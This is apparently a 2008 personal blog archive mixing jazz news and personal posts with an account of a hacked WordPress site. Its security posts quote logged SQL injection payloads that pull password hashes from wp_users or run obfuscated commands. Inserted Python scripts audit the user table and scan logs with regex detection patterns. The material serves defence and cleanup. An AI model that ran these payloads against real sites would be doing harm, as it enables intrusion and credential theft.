Update on musician Mark Turner

November 20th, 2008

Aaron Parks posted an update over the weekend about jazz musician Mark Turner’s progress in healing from his recent finger injuries:

Hi everyone,

I know many of you have been asking for more news about Mark’s condition. Out of respect for the privacy of him and his family during this difficult time, I’ve been a bit reluctant to make any more posts about it. Also, there’s a lot of people who have known him for much longer than me and would probably be better chosen for the job of keeping people informed. At this point, though, it seems that this blog has become the primary source for information about what happened, and therefore, it’s the place many people are coming to for information about ways that they can help. It’s with this in mind that I’m writing this post tonight.

Thinking: not just for brainiacs!

October 22nd, 2008

Rita Mae Brown once said that insanity is “doing the same thing, over and over again, but expecting different results.” I suppose insanity might also mean expecting people to apply critical thinking skills to anything.

I’ve been poking through MT.Net’s logfiles and I’m pleased to see so many searching for the Thomas Jefferson Bank Quote. As of today, MT.Net is the third Google result for those search terms. That’s all fine and good. What drives me up the wall is when I go to the pages linking to the quote, in many cases the linker is presenting the quote as fact, not even reading that I’ve debunked it! Um, did anyone read the post? What kind of fool would link a quote to a post that clearly says the quote is bogus?

No wonder America is falling behind the rest of the world when it comes to using our noggins.

Slashdotted!

October 21st, 2008

I got back from the James Taylor show to find MT.Net has been Slashdotted. Seems my Caller ID sleuthing in relation to Automotive Warranty Solutions caught someone’s attention.

I also see that I’m missing out on some big money. According to the NC Attorney General’s office, these warranty calls could be worth $500 to $5000 apiece! That’s some serious change in this down economy. Even better, I could invest that money in a lot more SIP phone numbers with which to snare even more fines. And I wouldn’t have to lift a finger to collect (well, I would have to show up for court, but I could earn potentially +$25k for each court case).

Hmm. Passive income paid by scammers … what am I waiting for?

VPSFarm to the rescue!

October 6th, 2008

No account of my weekend system administration adventures would be complete without acknowledging the outstanding customer support provided by my blog host provider, VPSFarm.

I emailed VPSFarm's customer support first thing Saturday morning requesting they shut down my server. This was completed for me in a matter of minutes, and Vinay at VPSFarm sent prompt replies to my emails throughout the entire weekend (even close to midnight). He even provided a tarfile backup of my system. In short, Vinay and VPSFarm went above and beyond the call of duty - far beyond what the meager amount of money I spend would justify.

It's easy to be a friend when times are easy, but when the chips are down you find out who your friends really are. Vinay Selvaraj and VPSFarm are the real deal. If you're looking for a Xen-based Linux box you'd be stupid to look anywhere else.

Bravo Zulu, VPSFarm!

Routed

October 5th, 2008

I’ve been working all weekend to seal up the leaks in MT.Net. I feel I’m at a point where things are pretty much back to normal. Passwords have been changed, databases scanned, files examined, and all possible patches have been applied. I went far beyond simply fixing Wordpress: updating the operating system was long overdue, so I did the whole nine yards.

Lessons learned? Whenever strange behavior presents itself, don't stop hunting until you're sure you've found it all. Sometimes this means ruling every possible thing out, as it's very tough (and also very foolish) to say "I'm secure." Only time can answer that.

If you run a Wordpress site, fire up a MySQL session and run this query:

select * from wp_users where user_login='WordPress';

If you find a “WordPress” user, delete it. It doesn’t belong there.

delete from wp_users where user_login='WordPress';

Also, you should not have entries in your user table with invalid dates. Delete any users that this query brings back:

select * from wp_users where user_registered like '%0000%';

I found this page to be useful for the final cleanup.
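As an added illustration (my own script, not part of the original post), here is the same audit run offline against a throwaway copy of a wp_users table filled with constructed rows. It flags the rogue "WordPress" login and any row whose user_registered is not a real date, which generalizes the LIKE '%0000%' check to malformed values that contain no run of zeros.

```python
import sqlite3
from datetime import datetime

# Constructed stand-in for a wp_users table (ID, user_login, user_registered); not a real dump.
SAMPLE_USERS = [
    (1, "admin", "2007-03-14 09:12:45"),
    (2, "reader", "2008-06-01 18:00:00"),
    (3, "WordPress", "0000-00-00 00:00:00"),  # the rogue login the post tells you to delete
    (4, "commenter", "0000-00-00 00:00:00"),  # zero date, ordinary-looking login
    (5, "editor", "2008-13-40 25:61:00"),     # malformed but would slip past LIKE '%0000%'
]

ROGUE_LOGINS = {"WordPress"}  # logins WordPress never creates on its own


def valid_registration(value):
    """True only if user_registered is a real MySQL DATETIME (zero dates fail)."""
    try:
        datetime.strptime(value, "%Y-%m-%d %H:%M:%S")
        return True
    except ValueError:
        return False


def build_db(rows):
    """In-memory table shaped like wp_users, so the audit can run without a live blog."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_registered TEXT)")
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", rows)
    return conn


def find_suspicious_users(conn):
    """Return (ID, login, reason) for rows the post's two cleanup queries would catch,
    plus any row whose registration date is malformed in some other way."""
    findings = []
    query = "SELECT ID, user_login, user_registered FROM wp_users ORDER BY ID"
    for uid, login, registered in conn.execute(query):
        if login in ROGUE_LOGINS:
            findings.append((uid, login, "rogue login"))
        elif not valid_registration(registered):
            findings.append((uid, login, "invalid user_registered: " + registered))
    return findings


if __name__ == "__main__":
    for uid, login, reason in find_suspicious_users(build_db(SAMPLE_USERS)):
        print(f"ID {uid} ({login}): {reason}")
```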

If you’ve got an MT.Net account (for posting comments, for instance), please take a moment to change it.

Restored

October 5th, 2008

It's been a busy weekend here at MT.Net. I've been cleaning up the MT.Net webhost after some script kiddies went wild with an exploit. I have a hunch the kiddies exploited a hole in the Bad Behavior plugin, as the only blogs on my site that got pwned were the ones running the BB plugin. There was a time when the BB plugin started acting funky and needed an upgrade, and BB would be an obvious target for the bad guys. Fortunately I had copious backups. (I find it interesting that the BB website is offline at the moment.)

If y'all see anything out of place, give me a holla. It's possible I missed something.

More webserver attacks

October 3rd, 2008

Just logged a few of these. Seems this attack has been discussed online before, but surprisingly there’s little information on it.

Note the attempt to get the user passwords from the wp_users table:

216.83.63.254 - - [03/Oct/2008:14:30:38 -0400] "GET /xmlrpc.php HTTP/1.1" 200 42 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
216.83.63.254 - - [03/Oct/2008:14:30:39 -0400] "POST /xmlrpc.php HTTP/1.1" 403 970 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
216.83.63.254 - - [03/Oct/2008:14:30:47 -0400] "POST /wp-trackback.php?tb_id=1 HTTP/1.1" 403 984 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
216.83.63.254 - - [03/Oct/2008:14:30:54 -0400] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 403 295 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
216.83.63.254 - - [03/Oct/2008:14:30:55 -0400] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 403 295 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
216.83.63.254 - - [03/Oct/2008:14:30:55 -0400] "GET /wp-trackback.php?p=1 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

Blog SQL injection attack

October 2nd, 2008

I’ve been logging a few attacks on my blog site which put the following into the logfiles:

163.19.104.88 - - [02/Oct/2008:05:57:15 -0400] "GET /?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x...%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 42469 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"

Turns out it's a SQL injection attack which is allegedly being carried out by a criminal gang called Rock Phish (or it's being carried out by two teenagers pretending to be a "gang"). The attack uses WAITFOR DELAY to see if it worked or not. The user agent and IP addresses change for each attack, so one has to be clever in defending against it. I've been blocking the IP when it comes up, but that becomes impractical after a while.
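An added example (my own code, not from the original posts) covering the log excerpts in this entry and in "More webserver attacks": it parses Apache combined-format lines, URL-decodes each request repeatedly so the double-encoded %2527 is seen as a quote, and flags the UNION SELECT, DECLARE/CAST/EXEC and WAITFOR DELAY patterns plus any reference to wp_users. The sample lines are constructed and modelled on the posts' excerpts; the 10.0.0.x addresses and the hex value 0x4142 are made up.

```python
import re
from urllib.parse import unquote

# Constructed Apache log lines modelled on the posts' excerpts (not the real logfile).
SAMPLE_LOG = """\
216.83.63.254 - - [03/Oct/2008:14:30:38 -0400] "GET /xmlrpc.php HTTP/1.1" 200 42 "-" "Mozilla/4.0 (k1b compatible)"
216.83.63.254 - - [03/Oct/2008:14:30:54 -0400] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 403 295 "-" "Mozilla/4.0 (k1b compatible)"
163.19.104.88 - - [02/Oct/2008:05:57:15 -0400] "GET /?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4142%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 42469 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
10.0.0.7 - - [02/Oct/2008:06:02:11 -0400] "GET /?p=1;WAITFOR%20DELAY%20'0:0:5'-- HTTP/1.1" 200 100 "-" "curl/7.18"
10.0.0.9 - - [03/Oct/2008:09:00:00 -0400] "GET /category/jazz/ HTTP/1.1" 200 8124 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request path and status code from a combined-format line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Each rule is (label, regex applied to the fully URL-decoded request path).
RULES = [
    ("union-select", re.compile(r"\bUNION\b.*\bSELECT\b", re.I)),
    ("mssql-exec", re.compile(r"\bDECLARE\b.*\bCAST\s*\(\s*0x[0-9a-f]+.*\bEXEC\b", re.I | re.S)),
    ("waitfor-delay", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("wp_users-probe", re.compile(r"\bwp_users\b", re.I)),
]


def decode_path(path):
    """Decode until stable, so double-encoded payloads (%2527 -> %27 -> ') are visible."""
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    return path.replace("+", " ")


def scan_log(text):
    """Return (ip, status, [labels]) for every request matching at least one rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        labels = [name for name, rx in RULES if rx.search(decode_path(m.group("path")))]
        if labels:
            hits.append((m.group("ip"), int(m.group("status")), labels))
    return hits


if __name__ == "__main__":
    for ip, status, labels in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} {', '.join(labels)}")
```

A 200 next to a flagged request is the line worth chasing: a 403 means the request was refused, while a 200 means the application actually handled it.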

Anniversary

September 11th, 2008

It's been nine wonderful years. Happy Anniversary, my love!

Blogging blocker

June 29th, 2008

You may have noticed I don't do much posting evenings and weekends. It's not that I don't want to or have anything to say, it's just that I've got an ailing laptop that's been giving me trouble recently.

I've known for a while that my Thinkpad T40 doesn't like to be run anywhere but from a desk. The moment it's anything but completely horizontal it promptly zaps its memory - leaving me to reboot the system. Frustrated by its lack of portability, I took it apart last night to see if I could find any visible damage. After an easy disassembly and look-over, I cranked it back up only to have it be even less reliable than before. Now it won't even boot consistently from a flat surface. That'll teach me to play technician!